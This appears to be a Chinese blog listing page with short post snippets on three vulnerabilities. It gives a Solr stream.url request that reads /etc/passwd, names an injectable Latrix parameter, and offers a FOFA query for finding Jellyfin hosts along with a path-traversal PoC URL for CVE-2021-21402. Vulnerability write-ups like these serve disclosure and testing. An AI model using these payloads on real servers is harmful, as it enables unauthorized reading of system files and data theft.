2021HW
逗比大师
CSDN停更,博x园平台保持更新
展开
-
Apache Solr 存在任意文件读取
访问:http://ip//solr/db/debug/dump?param=ContentStreams&stream.url=file:///etc/passwd (db为存在的应用名)原创 2021-04-09 16:07:00 · 164 阅读 · 0 评论 -
Latrix注入漏洞
/latrix/inandout.phptxtaccesscode参数存在SQL注入漏洞原创 2021-04-09 16:16:00 · 118 阅读 · 0 评论 -
Jellyfin任意文件读取漏洞(CVE-2021-21402)
FOFA语句:title="Jellyfin"可以通过访问http://<url>/Audio/anything/hls/<文件路径>/stream.mp3/读取任意文件。POC:http://xxx.xxx.xxx.xxx/Audio/1/hls/..%5C..%5C..%5C..%5C..%5C..%5CWindows%5Cwin.ini/strea...原创 2021-04-09 16:32:00 · 912 阅读 · 0 评论